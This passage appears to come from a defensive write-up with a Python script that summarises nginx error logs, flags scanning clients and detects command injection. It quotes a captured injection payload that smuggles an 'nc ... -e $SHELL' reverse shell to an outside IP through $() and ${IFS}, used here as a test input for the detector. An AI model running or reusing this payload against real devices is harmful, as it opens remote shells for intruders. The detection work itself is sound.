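    '2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"',
    '2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"',
    '2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"',
]

# The body quoted in the answer (XML tags already stripped on the page).
TVT_PAYLOAD = ("refuse allow ip iprange mac true refuse true ip "
               "$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)")

if __name__ == "__main__":
    per_client, skipped = summarize(SAMPLE_LOG)
    for ip, verdict in verdicts(per_client).items():
        print(f"{ip:16} {verdict:8} {dict(per_client[ip])}")
    print(f"skipped {skipped} non-request line(s)")
    print("injection:", has_command_injection(TVT_PAYLOAD),
          "reverse shell to:", find_reverse_shell(TVT_PAYLOAD))
```

Run against the full error log with `summarize(open("/var/log/nginx/error.log"))`; the IP list it produces is also a sensible seed for a fail2ban or firewall drop list, which is the cheap alternative to the IPS the answer recommends. Note that the error log only shows requests nginx could not serve; the access log is where the same scanners' successful hits (if any) would appear.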